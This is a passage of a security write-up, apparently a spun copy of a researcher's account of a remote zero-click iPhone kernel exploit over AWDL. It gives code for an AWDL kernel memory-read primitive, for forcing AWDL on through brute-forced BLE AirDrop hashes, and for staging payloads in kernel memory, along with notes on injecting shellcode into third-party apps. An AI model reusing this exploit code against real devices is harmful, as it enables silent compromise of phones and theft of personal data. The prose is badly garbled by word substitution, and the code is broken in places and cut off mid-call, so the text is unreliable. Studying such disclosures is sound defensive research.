memcpy(&ifr.ifr_hwaddr.sa_data[0], mac, 6);

int s=socket(AF_INET, SOCK_DGRAM, 0);

strcpy(ifr.ifr_name, “wlan1”);

ifr.ifr_hwaddr.sa_family=ARPHRD_ETHER;

int ret=ioctl(s, SIOCSIFHWADDR, &ifr);

printf(“ioctl retval: %dn”, ret);

This interface is deprecated and doesn’t work at desirous about this driver.

3 techniques to construct a MAC: 2 – netlink

The present supported interface is netlink. It took a entire day to learn enough about netlink to write a standalone PoC to trade a MAC take care of. Netlink is presumably very great nonetheless moreover rather obtuse. And even in any case that (presumably unsurprisingly) it be no sooner than the expose line instrument which is de facto loyal making these identical netlink API calls too.

Take a look at out change_mac_nl.c in the released exploit source code to scrutinize the netlink code.

3 techniques to construct a MAC: 3 – hacker

Searching for to set that the supported formulation has failed, it be loyal formulation too unhurried. However brooding about it, what’s the MAC anyway? It’s nearly with no doubt loyal some discipline saved in flash or RAM on the chipset and yes, diving in to the mt76x2u linux kernel driver source and tracing the suggestions which put the MAC take care of we can scrutinize that finally ends up writing to a couple configuration registers on the chip:

#interpret MT_MAC_ADDR_DW0 0x1008

#interpret MT_MAC_ADDR_DW1 0x100c

void mt76x02_mac_setaddr(struct mt76x02_dev *dev, const u8 *addr)

{

  static const u8 null_addr[ETH_ALEN]={};

  int i;

  ether_addr_copy(dev->mt76.macaddr, addr);

  if (!is_valid_ether_addr(dev->mt76.macaddr)) {

    eth_random_addr(dev->mt76.macaddr);

    dev_info(dev->mt76.dev,

             “Invalid MAC take care of, the utilization of random take care of %pMn”,

             dev->mt76.macaddr);

  }

  mt76_wr(dev,

          MT_MAC_ADDR_DW0,

          get_unaligned_le32(dev->mt76.macaddr));

  mt76_wr(dev,

          MT_MAC_ADDR_DW1,

          get_unaligned_le16(dev->mt76.macaddr + 4) |

            FIELD_PREP(MT_MAC_ADDR_DW1_U2ME_MASK, 0xff));

   …

I wonder if I could presumably perchance perchance loyal write straight to these configuration registers? Would it no longer entirely blow up? Or wouldn’t it loyal work? Is there a in point of fact simple formulation to set that or will I undoubtedly have to patch the motive force?

Having a scrutinize across the motive force barely we can scrutinize it has a debugfs interface. Debugfs is a extremely perfect formulation for drivers to without complications uncover hundreds internal stuff out to userspace, restricted to root, for logging and monitoring as effectively as for messing round with:

root@raspberrypi:/sys/kernel/debug/ieee80211/phy7/mt76# ls

agc  ampdu_stat  dfs_stats  edcca  eeprom  led_pin  queues  rate_txpower  regidx  regval  temperature  tpc  tx_hang_reset  txpower

What we’re after is a formulation to write to arbitrary defend watch over registers, and these two debugfs recordsdata enable you to construct precisely that:

# cat regidx

0

# cat regval

0x76120044

Whereas you happen to write the take care of of the configuration register you ought to learn or write to the regidx file as a decimal imprint then reading or writing the regval file allows you to learn or write that configuration register as a 32-bit hexadecimal imprint. Show camouflage that exposing configuration registers this form is a feature of this specific driver’s debugfs interface, no longer a generic feature of debugfs. With this we can entirely skip the netlink interface and the requirement to bring the instrument down and as an different straight manipulate the internal pronounce of the adaptor.

I replace the netlink code with this:

void mt76_debugfs_change_mac(charphy_str, struct ether_addr new_mac) {

    union mac_dwords {

      struct ether_addr new_mac;

      uint32_t dwords[2];

    } info={0};

    info.new_mac=new_mac;

    char lower_dword_hex_str[16]={0};

    snprintf(lower_dword_hex_str, 16, “0x%08xn”, info.dwords[0]);

    char upper_dword_hex_str[16]={0};

    snprintf(upper_dword_hex_str, 16, “0x%08xn”, info.dwords[1]);

    charregidx_path=NULL;

    asprintf(&regidx_path,

             “/sys/kernel/debug/ieee80211/%s/mt76/regidx”,

             phy_str);

    charregval_path=NULL;

    asprintf(&regval_path,

             “/sys/kernel/debug/ieee80211/%s/mt76/regval”,

             phy_str);

    file_write_string(regidx_path, “4104n”);

    file_write_string(regval_path, lower_dword_hex_str);

    file_write_string(regidx_path, “4108n”);

    file_write_string(regval_path, upper_dword_hex_str);

    free(regidx_path);

    free(regval_path);   

}

and… it undoubtedly works! The adaptor right away begins ACKing frames to whichever MAC take care of we write in to the MAC take care of discipline in the adaptor’s configuration registers.

All that’s then required is a rewrite of the early learn code:

Now it begins out guidance 8 stalled guests. Every time a learn is requested, if there could be aloof time left ahead of guidance will timeout and there are aloof stalled guests, one stalled ogle is chosen, has it be steering_msg_blob pointer corrupted with the learn purpose and gets unstalled. The purpose will start sending UMIs to that ogle, we put the upright MAC take care of on the full of life video display instrument, sniff the UMI and ACK it to discontinue the ogle sending more. From the UMI we extract the imprint from TLV 0x1d and catch the disclosed kernel memory.

If there are no more stalled guests, or guidance has timed out, we wait a stable period of time except we’re ready to restart all 8 guests and start again:

struct ether_addr reader_peers[8];

struct early_read_params {

    struct ether_addr dst;

    charphy_str;

} er_para;

void init_early_read(struct ether_addr dst, charphy_str) {

  er_para.dst=dst;

  er_para.phy_str=phy_str;

  reader_peers[0]=*(ether_aton(“22: 22:aa: 22: 00: 00”));

  reader_peers[1]=*(ether_aton(“22: 22:aa: 22: 00: 01”));

  reader_peers[2]=*(ether_aton(“22: 22:aa: 22: 00: 02”));

  reader_peers[3]=*(ether_aton(“22: 22:aa: 22: 00: 03”));

  reader_peers[4]=*(ether_aton(“22: 22:aa: 22: 00: 04”));

  reader_peers[5]=*(ether_aton(“22: 22:aa: 22: 00: 05”));

  reader_peers[6]=*(ether_aton(“22: 22:aa: 22: 00: 06”));

  reader_peers[7]=*(ether_aton(“22: 22:aa: 22: 00: 07”));

}

// pronounce required between early reads:

uint64_t steering_begin_timestamp=0;

int n_steered_peers=0;

voidtry_early_read(uint64_t kaddr, size_tout_size) {

  struct ether_addr peer_b=*(ether_aton(“22: 22:bb: 22: 00: 00”));

  int n_peers=8;

  struct ether_addr reader_peer;

  int should_restart_steering=0;

  // what fragment are we in?

  uint64_t milliseconds_since_last_steering=

    (now_nanoseconds() – steering_begin_timestamp) /

    (1ULL*1000ULL*1000ULL);

  

  if (milliseconds_since_last_steering

      n_steered_peers

    // if lower than 5 seconds have elapsed since we began guidance

    // and we have not reached the ogle restrict, then steer the next ogle

    reader_peer=reader_peers[n_steered_peers++];

  } else if (milliseconds_since_last_steering

    // anticipate the guidance machine to timeout so we can restart it

    usleep((8000 – milliseconds_since_last_steering) 1000);

    should_restart_steering=1;

  } else {

    // more than 8 seconds have already elapsed since we closing 

    //began guidance (or we have never began it) so restart

    should_restart_steering=1;

  }

  if (should_restart_steering) {

    // form reader guests reliable for bss guidance

    n_steered_peers=0;

    for (int i=0; i

      inject(RT(),

          WIFI(er_para.dst, reader_peers[i]),

          AWDL(),

          SYNC_PARAMS(),

          CHAN_SEQ_EMPTY(),

          HT_CAPS(),

          UNICAST_DATAPATH(0x1307 | 0x800),

          PKT_END());

    }

    inject(RT(),

           WIFI(er_para.dst, peer_b),

           AWDL(),

           SYNC_PARAMS(),

           HT_CAPS(),

           UNICAST_DATAPATH(0x1307),

           BSS_STEERING_0(reader_peers, n_peers),

           PKT_END());

    steering_begin_timestamp=now_nanoseconds();

    reader_peer=reader_peers[n_steered_peers++];

  }

  char overflower[128]={0};

  *(uint64_t*)(&overflower[0x50])=kaddr;

 

  // set the card’s MAC to ACK the UMI from the target

  mt76_debugfs_change_mac(er_para.phy_str, reader_peer);

  inject(RT(),

      WIFI(er_para.dst, reader_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      HT_CAPS(),

      DATAPATH(reader_peer),

      SYNC_TREE((struct ether_addr*)overflower,

                sizeof(overflower)/sizeof(struct ether_addr)),

      PKT_END());

  // try to receive a UMI:

  voidsteering_tlv=try_get_TLV(0x1d);

  if (steering_tlv) {

    struct mini_tlv {

      uint8_t type;

      uint16_t len;

    } __attribute__((packed));

    *out_size=((struct mini_tlv*)steering_tlv)->len+3;

  } else {

    printf(“didn’t catch TLVn”);

  }

  // NULL out the bsssteering blob

  char null_overflower [128]={0};

  inject(RT(),

      WIFI(er_para.dst, reader_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      HT_CAPS(),

      DATAPATH(reader_peer),

      SYNC_TREE((struct ether_addr*)null_overflower,

                sizeof(null_overflower)/sizeof(struct ether_addr)),

      PKT_END());

  // the full of life video display interface doesn’t consistently organize to ACK

  // the first physique, give it an opportunity

  usleep(1*1000);

  return steering_tlv;

}

With some luck we can bootstrap the sooner learn frail with 8 or fewer early reads that means on an iPhone 11 Expert with AWDL enabled popping calc now looks enjoy this:

On this demo AWDL has been manually enabled by opening the sharing panel in the Photographs app. This retains the AWDL interface full of life. The exploit gains arbitrary kernel memory learn and write internal a few seconds and is able to inject a mark into a userspace direction of to reason it to JOP to a single system which opens Calculator.app

I talked about that AWDL has to be enabled, it is miles rarely consistently on. In expose to form this an interactionless zero-click on exploit which would perchance purpose any instrument in radio proximity we therefore want a formulation to power devices to enable their AWDL interface.

AWDL is faded for many things. For example, my iPhone looks to flip on AWDL when it receives a voicemail since it undoubtedly desires to Airplay the voicemail to my Apple TV. However sending somebody a voicemail requires their phone quantity, and we’re attempting to fetch an attack which requires no identifiers or non-default settings.

The 2nd learn paper from the SEEMOO labs personnel demonstrated an attack to enable AWDL the utilization of Bluetooth low energy commercials to power arbitrary devices in radio proximity to enable their AWDL interfaces for Airdrop. SEEMOO didn’t submit their code for this attack so I particular to recreate it myself.

Within the iOS photos app must you plot cease the sharing dialog and click on “Airdrop” an inventory of iOS and MacOS devices nearby looks, all of which that it is doubtless you’ll ship your describe to. Most other folks construct no longer need random passers-by sending them unsolicited photos so the default AirDrop sharing environment is “Contacts Ultimate” that means you’re going to only scrutinize AirDrop sharing requests from customers on your contacts book. However how does this work? For an in-depth discussion, test out the SEEMOO labs paper.

When a instrument desires to fragment a file through AirDrop it begins broadcasting a bluetooth low-energy commercials which looks enjoy this instance, broadcast by MacOS:

[PACKET] [ CH:37|CLK:1591031840.920892|RSSI:-44dBm ] >

BLE commercials are tiny, they’ve a maximum payload size of 31 bytes. The bundle of bytes at the discontinue are undoubtedly four truncated 2-byte SHA256 hashes of the contact info of the instrument which is attempting to fragment one thing. The contact info faded are the electronic mail addresses and phone numbers related to the instrument’s logged-in iCloud memoir. You also can generate the identical truncated hashes enjoy this:

On this case I’m the utilization of a test memoir with the iCloud electronic mail take care of: ‘chris.donut1981@icloud.com’

>>> import hashlib

>>> s=’chris.donut1981@icloud.com’

>>> hashlib.sha256(s.encode(‘utf-8’)).hexdigest()[:4] 

’62b3′

Understand that this matches the two penultimate bytes in the advertisement physique shown above. The contact hashes are unsalted which can have some fun penalties must you stay in a nation with localized cell phone numbers, nonetheless that is an understandable performance optimization.

All iOS devices are continuously receiving and processing BLE advertisement frames enjoy this. Within the case of these AirDrop commercials, when the instrument is in the default “Contacts Ultimate” mode, sharingd (which parses BLE commercials) checks whether this unsalted, truncated hash matches the truncated hashes of any emails or phone numbers in the instrument’s take care of book.

If a match is figured out this doesn’t undoubtedly point out the sending instrument undoubtedly is in the receiver’s take care of book, loyal that there could be a contact with a colliding hash. In expose to catch to the bottom of this the devices favor to fragment more info and at this point the receiver lets in AWDL to construct the next-bandwidth verbal exchange channel.

The SEEMOO labs paper continues in big factor about how the two devices then undoubtedly verify that the sender is in the receiver’s take care of book, nonetheless we are only attempting to catch AWDL enabled so we’re carried out. As lengthy as we defend broadcasting the advertisement with the colliding hash the purpose’s AWDL interface will remain full of life.

The SEEMOO labs personnel paper discusses the customized firmware they wrote for a BBC micro:bit so I picked up a few these:

The BBC micro:bit is an training-centered dev board. This describe shows the rear of the board; the entrance has a 5×5 LED matrix and two buttons. They cost below $20.

These devices are supposed for the educational/maker market. It is a Nordic nRF51822 SOC with a Freescale KL26 performing as a USB programmer for the nRF51. BBC present a tiny programming environment for it, nonetheless that it is doubtless you’ll manufacture any firmware image for the nRF51, prance in the micro:bit which looks as a mass-storage instrument due to the KL26 and breeze and drop the firmware image on there. The programmer chip flashes the nRF51 for you and likewise that it is doubtless you’ll streak your code. Right here is the instrument which the SEEMOO labs personnel faded and wrote a customised firmware for.

Whilst taking half in round with the micro:bit I figured out the MIRAGE project, a generic and amazingly effectively documented project for doing all formulation of radio safety learn. Their instruments have a firmware for the micro:bit, and certainly, shedding their provided firmware image on to the micro:bit and working this:

sudo ./mirage_launcher ble_sniff SNIFFING_MODE=commercials INTERFACE=microbit0

we’re ready to begin sniffing BLE commercials:

[PACKET] [ CH:37|CLK:1591006615.511192|RSSI:-46dBm ] >

Indeed, must you construct this at home you will likely be in a position to likely scrutinize a barrage of BLE traffic from every thing which that that it is doubtless you’ll factor in. Apple devices are particularly chatty, scrutinize the frames despatched at any time when your Airpods case is initiate and closed.

If we pick a scrutinize at a few captured BTLE frames once we strive to fragment a file through AirDrop, we can scrutinize there could be clearly structure in there:

MacOS:

info=02010617ff4c000512000000000000000001fa5c2516bf07aba400

iOS 13:

info=02011a020a070eff4c000f05a035c928291002710c

             LEN    APPL T L  V

020106       17  ff 4c00 0512 000000000000000001 fa5c 2516 bf07 aba4 00

02011a020a07 0e  ff 4c00 0f05 a035c92829 1002 710c

Definitely looks enjoy more TLVs! With some reversing in sharingd we can resolve out what these forms are:

“Invalid” 0x0

“Hash” 0x1

“Firm” 0x2

“AirPrint” 0x3

“ATVSetup” 0x4

“AirDrop” 0x5

“HomeKit” 0x6

“Prox” 0x7

“HeySiri” 0x8

“AirPlayTarget” 0x9

“AirPlaySource” 0xa

“MagicSwitch” 0xb

“Continuity” 0xc

“TetheringTarget” 0xd

“TetheringSource” 0xe

“NearbyAction” 0xf

“NearbyInfo” 0x10

“WatchSetup” 0x11

MacOS is sending AirDrop messages in the BLE commercials. iOS is sending NearbyAction and NearbyInfo messages.

For testing applications we need some contacts on the instrument. Fancy the SEEMOO labs paper I generated 100 random contacts the utilization of a modified version of the AppleScript in this StackOverflow acknowledge. Every contact has 4 contact identifiers: home and work electronic mail, home and work phone numbers.

We can moreover utilize MIRAGE to prototype brute forcing by procedure of the 16 bit location of truncated contact hashes. I wrote a MIRAGE module to broadcast Airdrop commercials with incrementing truncated hashes. The MIRAGE micro:bit firmware doesn’t enhance arbitrary broadcast physique injection nonetheless it is miles able to make utilize of the Raspberry Pi 4’s constructed-in bluetooth controller. Operating it for a whereas and the console output from the iPhone we scrutinize some critical log messages exhibiting up in Console.app:

Hashing: Error: didn’t catch contactsContainsShortHashes because (ratelimited)

The SEEMOO paper talked about that they had been ready to brute power a truncated hash in a few seconds nonetheless it looks Apple have now added some price limiting.

Spoofing various BT source MAC addresses didn’t attend nonetheless slowing the brute power attempts to 1 every 2 seconds or so looked as if it can presumably perchance perchance please the price limiting and in round 30 seconds, with realistic luck AWDL gets enabled and MI and PSF frames open to seem on the AWDL social channels.

As lengthy as we defend broadcasting the identical advertisement with the matching contact hash the AWDL interface will remain full of life. I didn’t want to defend up MIRAGE as a dependency so I ported the python prototype to make utilize of the linux native libbluetooth library and hci_send_cmd to manufacture customized advertisement frames:

uint8_t payload[]={0x02, 0x01, 0x06,

                     0x17,

                     0xff,

                     0x4c, 0x00, 

                     0x05, 

                     0x12, 

                     0x00, 0x00, 0x00, 0x00,

                     0x00, 0x00, 0x00, 0x00, 0x01, 

                     hash1[0], hash1[1],

                     hash2[0], hash2[1],

                     hash3[0], hash3[1],

                     hash4[0], hash4[1],

                     0x00};

le_set_advertising_data_cp info={0};

info.length=sizeof(payload);

memcpy(info.info, payload, sizeof(payload));

hci_send_cmd(address,

             OGF_LE_CTL,

             OCF_LE_SET_ADVERTISING_DATA,

             sizeof(payload)+1,

             &info);

Combining the AWDL exploit and BLE brute-power, we catch a brand contemporary demo:

With the phone left sluggish on the home camouflage camouflage and no one interaction we power the AWDL interface to suggested the utilization of BLE commercials. The AWDL exploit gains kernel memory learn write in a few seconds after starting and your entire discontinue to entire exploit takes round a minute.

There can also simply effectively be better, sooner techniques to power-enable AWDL nonetheless for my demo this also can simply construct.

This demo is good nonetheless undoubtedly doesn’t convey that we have compromised nearly all of the person’s info, with no interaction. We can learn and write kernel memory remotely. I do know that Apple has invested fundamental effort in “put up-exploitation” hardening so I wished to converse that with loyal this single vulnerability these can also simply be defeated to the point the put I could presumably perchance perchance streak one thing enjoy an genuine-world implant which we have considered being deployed in actual world exploitation against discontinue customers ahead of. Searching for to defend against an attacker with arbitrary memory learn/write is a losing game, nonetheless there could be a distinction between asserting that and likewise you believing me, and proving it.

We will favor to write procedure more arbitrary info for this final step, so we need the arbitrary write to be even sooner. There could be every other optimization left.

Due to the expose wherein loads and stores happen in actionFrameReport we had been ready to manufacture a frail which gave us a timestamp expert for up to 1024ms and a huge n_frames_in_last_second imprint. We faded that to construct one arbitrary add, then restarted the total setup: replaced upper_peer‘s timestamp with 0, despatched every other physique to catch a novel timestamp and so forth.

However why can no longer we loyal defend the utilization of the first timestamp and bundle more writes collectively? We can, it be loyal well-known to pick out care that we construct no longer exceed that 1024ms window. The exploit takes a extremely conservative procedure right here and uses only a few extra milliseconds. The motive being that we’re working as a recent userspace program on a tiny system. We construct no longer have the rest enjoy actual-time scheduling ensures. Linux form-of helps working userspace suggestions on isolated cores to give one thing enjoy an genuine-time skills, nonetheless for getting this demo exploit working it modified into enough to pick out the priority of the exploit direction of with effective and lope away a huge safety window in the 1024ms. The code tries to bundle big buffer writes in chunks of 16 which provides an realistic tempo up.

Manner support once I released the first demo exploit which disclosed random chunks of physical memory I had taken a scrutinize at how the physmap works on iOS.

Linux, Windows and XNU all have physmaps; they are a extremely convenient formulation of manipulating physical memory when your code has paging enabled and can also circuitously manipulate physical memory to any extent extra.

Abstractly, physmaps are virtual mappings of all of physical memory

The physmap is (customarily) a 1:1 virtual mapping of physical memory. You also can scrutinize in the map how the physical memory at the bottom is at risk of be split up into various areas, with some of these areas for the time being mapped in the kernel virtual take care of location. One more physical memory areas can also to illustrate be faded for userspace processes.

The physmap is the giant kernel virtual memory put shown in direction of the upright of the virtual take care of location, which is the identical size because the amount of physical memory. The pagetables which translate virtual memory accesses in this put are put up in this form of formulation that any catch entry to at an offset into the physmap virtual put gets translated to that identical offset from the imperfect of physical memory.

The physmap in XNU is rarely always put up precisely enjoy that. As a replacement they utilize a “segmented physical aperture“. In practise this implies that they put up a series of smaller “sub-physmaps” for the period of the physmap put and populate a table called the PTOV table to enable translation from a physical take care of to a virtual take care of for the period of the physmap put:

pa: 0x000000080e978000 kva: 0xfffffff070928000 len: 0xde03c000 (3.7GB)

pa: 0x0000000808e14000 kva: 0xfffffff06ade4000 len: 0x05b44000 (95MB)

pa: 0x0000000801b80000 kva: 0xfffffff066000000 len: 0x04cb8000 (80MB)

pa: 0x0000000808d04000 kva: 0xfffffff06acf4000 len: 0x000f0000 (1MB)

pa: 0x0000000808df4000 kva: 0xfffffff06acd4000 len: 0x00020000 (130kb)

pa: 0x0000000808cec000 kva: 0xfffffff06acbc000 len: 0x00018000 (100kb)

pa: 0x0000000808a80000 kva: 0xfffffff06acb8000 len: 0x00004000 (16kb)

pa: 0x0000000808df4000 kva: 0xfffffff06acf4000 len: 0x00000000 (0kb)

There could be every other well-known physical put no longer captured in the PTOV table which is the kernelcache image itself; that is figured out starting at gVirtBase and the kernel suggestions for translating between physical and physmap-virtual addresses pick this into memoir.

The spirited thing is that the virtual protection of the pages in the physmap doesn’t have to compare the virtual protection of the pages as considered by a internet page table traversal from the standpoint of a role. I wrote some test code the utilization of oob_timestamp to overwrite a allotment of its have __TEXT segment in the physmap and it worked, permitting me to construct contemporary native instructions. Could well we construct userspace shellcode remotely by writing loyal straight into the physmap?

This works fair when prototyped the utilization of oob_timestamp editing itself; nonetheless must you strive to make utilize of it to purpose a system direction of, it panics. One thing else goes on.

The canonical resource for APRR is s1guza’s weblog put up. It is a hardware customization by Apple to be able to add an extra layer of indirection to internet page protection lookups through a defend watch over register. The internet page-tables on my own are no longer enough to resolve the runtime memory protection of a internet page.

APRR is faded in the Safari JIT hardening and in the kernel it be faded to enforce PPL (Page Safety Layer). For an in-depth scrutinize at PPL test out Brandon Azad’s present weblog put up.

PPL uses APRR to dynamically switch the internet page protections of two kernel areas, a textual relate put containing code and a info put. Usually the PPL textual relate put is no longer executable and the PPL info put is no longer writable. Distinguished info structures had been moved into this PPL info put, in conjunction with internet page tables and pmaps (the abstraction layer above internet page tables). The total code which modifies objects internal PPL info has been moved for the period of the PPL textual relate segment.

However if the PPL textual relate is non-executable, how are you going to streak the code to change the PPL info areas? And the procedure are you able to form them writable?

The one formulation to construct the code for the period of the PPL textual relate put is to battle by procedure of a trampoline feature which flips the APRR register bits to form the PPL textual relate put executable and the PPL info put writable ahead of leaping to the provided ppl_routine. Obviously big care has to be taken to form sure only code internal PPL textual relate runs in this pronounce.

Brandon likened this to a “kernel for the period of the kernel” which is an loyal formulation to scrutinize at it. Changes to internet page tables and pmaps are undoubtedly supposed to only happen by the kernel making “PPL syscalls” to demand the adjustments, with the implementation of these PPL syscalls being for the period of the PPL textual relate put. Take a look at out Brandon’s weblog put up for discussion of exploit a vulnerability in the PPL code to form these adjustments anyway!

It looks that it be no longer loyal internet page tables and pmaps which PPL protects. Reversing more of the PPL routines there could be a fragment of them starting round routine 38 that are implementing a brand contemporary mannequin of codesigning enforcement called pmap_cs.

Indeed, this pmap_cs string looks in the released XNU source, though attempts had been made to strip as a lot of the PPL related code as which that that it is doubtless you’ll recall to mind from the initiate source begin. The vm_map_entry structure has this contemporary discipline:

  /boolean_t */ pmap_cs_associated:1, /pmap_cs will validate */

From this code snippet from vm_fault.c it be rather particular that pmap_cs is a brand contemporary formulation to verify code signatures:

#if PMAP_CS

  if (fault_info->pmap_cs_associated &&

       pmap_cs_enforced(pmap) &&

       !m->vmp_cs_validated &&

       !m->vmp_cs_tainted &&

       !m->vmp_cs_nx &&

       (prot & VM_PROT_EXECUTE) &&

       (caller_prot & VM_PROT_EXECUTE)) {

         /*

          With pmap_cs, the pmap layer will validate the

          code signature for any executable pmap mapping.

          No need for us to validate this internet page too:

          in pmap_cs we believe…

          */

          vm_cs_defer_to_pmap_cs++;

  } else {

    vm_cs_defer_to_pmap_cs_not++;

    vm_page_validate_cs(m);

  }

#else /PMAP_CS */

  vm_page_validate_cs(m);

#endif /PMAP_CS */

vm_page_validate_cs is the aged code-signing enforcement code, which would be without complications tricked into permitting shellcode by changing the codesigning enforcement flags in the activity‘s proc structure. The request is what determines whether the contemporary pmap_cs mannequin or the aged procedure is faded?

The elementary request I’m attempting to acknowledge is why the physmap shellcode injection formulation works for a test app I’m debugging, nonetheless no longer a system direction of, even when the system direction of’s code signing flags had been modified such that it desires to be allowed to streak unsigned code?

We can scrutinize a reference to pmap_cs_enforced in the snippet above nonetheless the definition of this implies is stripped from the released XNU source code. With IDA we can scrutinize it be checking the byte at offset +0x108 in the pmap structure. Nowhere in the XNU code looks to defend watch over this discipline though.

Reversing the pmap_cs PPL code we fetch that this discipline is referenced in pmap_cs_associate_internal_options, called by PPL routine 44.

This option has some critical logging strings from which we can learn that it be being called to accomplice a code-signing structure with a virtual memory put. This code signing structure is a pmap_cs_code_directory, and we can resolve from this terror log message:

if (trust_level !=3) {

  terror(“”attempting to enter a binary in nested put with too low believe level %d””, cd_entry->trust_level);

}

that the discipline at +0x54 represents the “believe level” of the binary.

Extra down the feature we can scrutinize this:

  if ( trust_level !=1 )

    goto LABEL_38;

  pmap->pmap_cs_enforced=0;

   …

  return KERN_NOT_SUPPORTED;

Potentially my test apps signed by my developer certificates are getting this trust_level of 1 and therefore falling support to the aged code-signing enforcement code. I had a hunch that presumably this moreover utilized to third-occasion suggestions from the App Retailer; rather then painstakingly persevering with to reverse engineer pmap_cs I loyal tried installing and working an App Retailer app (in this case, YouTube) on the phone then the utilization of oob_timestamp to dump the pmap structures for every working direction of. Indeed, there had been three pmaps with pmap_cs_enforced put to 0: kernel_task (no longer so spirited because KTRR protects the kernel TEXT segment), oob_timestamp and YouTube!

This implies that we can utilize the faraway kernel learn/write to inject shellcode into any third-occasion app working on the instrument. In spite of every thing, we construct no longer need the prerequisite that the purpose desires to be working a third-occasion utility, so we can utilize the formulation developed earlier to initiate the calculator to as an different spawn a third-occasion app. If the instrument doesn’t have any third-occasion suggestions installed this device would no longer work, nonetheless we have already bought kernel memory learn/write so there are rather a few more avenues on hand for working code in some form on the instrument. However for now, we’ll pick the purpose instrument has as a minimum 1 App Retailer app installed.

Our arbitrary write is fairly rapidly nonetheless aloof too unhurried for us to make utilize of it to write a entire payload into the physmap that formulation. As a replacement, let’s manufacture a staged loader.

We are in a position to strive to write a minimal piece of initial shellcode through the physmap that will most likely be streak because the coarse mark handler. Its only cause will likely be to bootstrap a better payload and leap to it. The premise will likely be to construct fragments of our final payload in kernel memory which the bootstrap code will fetch, copy into userspace, form executable and leap to.

Earlier I talked about the service_response formulation for building a heap groom. I eminent that this modified into a nearly supreme heap grooming frail: we defend watch over the size of the allocations and can also put arbitrary bytes at arbitrary offsets internal them. I moreover eminent that it looked as if it can presumably perchance perchance be a comely memory leak as even when the AWDL interface is disabled, the memory never gets freed.

This moreover looks enjoy a huge frail for staging our payload. All we favor to construct is resolve out the take care of of the leaked memory.

The parser for the provider response TLV (form 2) which causes the memory wraps the kalloc‘ed buffer in an IO80211ServiceRequestDescriptor object. The pointer to the buffer is at offset +0x40 in there.

The IO80211ServiceRequestDescriptor is then enqueued into an IO80211CommandQueue in the IO80211AWDLPeerManager at +0x2968 which I’ve called response_fragments:

  peer_manager->response_fragments->lockEnqueue(response)

The lockEnqueue capability calls ::enqueue that can add the contemporary factor at the head of the queue’s linked list if both of the two following checks pass:

if ( this->max_elems_per_bucket==0x1000000 || 

     this->max_elems_per_bucket this->num_buckets> this->depend )

If these checks fail the enqueue capability returns an error, nonetheless the processServiceResponseTLV capability never checks this error. The motive we catch a comely memory leak right here is for the reason that peer_manager‘s response_fragments queue is created with max_elems_per_bucket put to 8, that means that after 8 incomplete fragments have arrived no more will likely be enqueued. The provider response code doesn’t address this case and the return imprint of lockEnqueue is rarely always checked. The code no longer has a pointer to the RequestDescriptor and it can perchance no longer be freed. Right here is in quite a bit of techniques convenient for the heap groom, nonetheless below no circumstances convenient once we want to perceive the take care of of the allocation!

Using the arbitrary write we can lengthen the queue restrict to a a lot better imprint, and now our code works and we can, with loyal a few frames, put controlled buffers of up to round 1000 bytes in kernel memory and fetch their addresses by parsing the queue structure . Right here is the wrapper feature for this performance in the exploit:

uint16_t kmem_leak_peer_id=0;

uint64_t

copy_buffer_to_kmem(voidbuf,

                    size_t len,

                    uint16_t kalloc_size,

                    uint16_t offset) {

  struct ether_addr kmem_leak_peer= 

    *(ether_aton(“22: 99: 33: 71: 00: 00”));

  *(((uint16_t*)&kmem_leak_peer)+2)=kmem_leak_peer_id++;

  inject(RT(),

      WIFI(kl_parm.dst, kmem_leak_peer),

      AWDL(),

      SY

>

=span>=span>
Read More

Recent Content